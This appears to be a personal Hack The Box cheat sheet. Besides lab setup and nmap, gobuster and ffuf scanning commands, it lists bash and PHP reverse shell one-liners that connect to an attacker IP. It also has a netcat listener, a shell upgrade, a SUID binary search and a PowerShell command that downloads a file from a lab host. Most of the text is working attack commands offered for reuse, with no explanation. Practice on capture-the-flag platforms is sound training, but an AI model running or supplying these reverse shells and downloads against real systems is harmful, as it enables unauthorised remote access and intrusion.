HTB-Note

note about Hack The Box

Virtual Box Setting

cd /media/
sudo mount /dev/cdrom /media/cdrom1
cd /cdrom1
sudo ./VBoxLinuxAdditions.run 
reboot

sudo openvpn --config ./Desktop/yufujioka.ovpn

nmap -sV rhost

nmap -O rhost

nmap -A rhost

nmap -Pn rhost

nmap --script=vuln -p rport1,rport2 rhost

gobuster dir -t 100 -u targetUrl -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o outfile

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u targetUrl/FUZZ

nc -lnvp 1234

exec 5<>/dev/tcp/my_ip/my_port
/bin/bash -i >& /dev/tcp/my_ip/my_port 0>&1
/bin/bash -c "bash -i >& /dev/tcp/my_ip/my_port 0>&1"

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");

php -r '$sock=fsockopen("your.server.ip.address",1234);exec("/bin/bash -i <&3 >&3 2>&3");'

<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>

php -r '$s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");'

python3 -c "import pty; pty.spawn('/bin/bash')"

find / -perm -u=s -type f 2>/dev/null

$env:UserName

Get-PSDrive

Set-Location C:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.22:8000/file','filename')"

my note about Hack The Box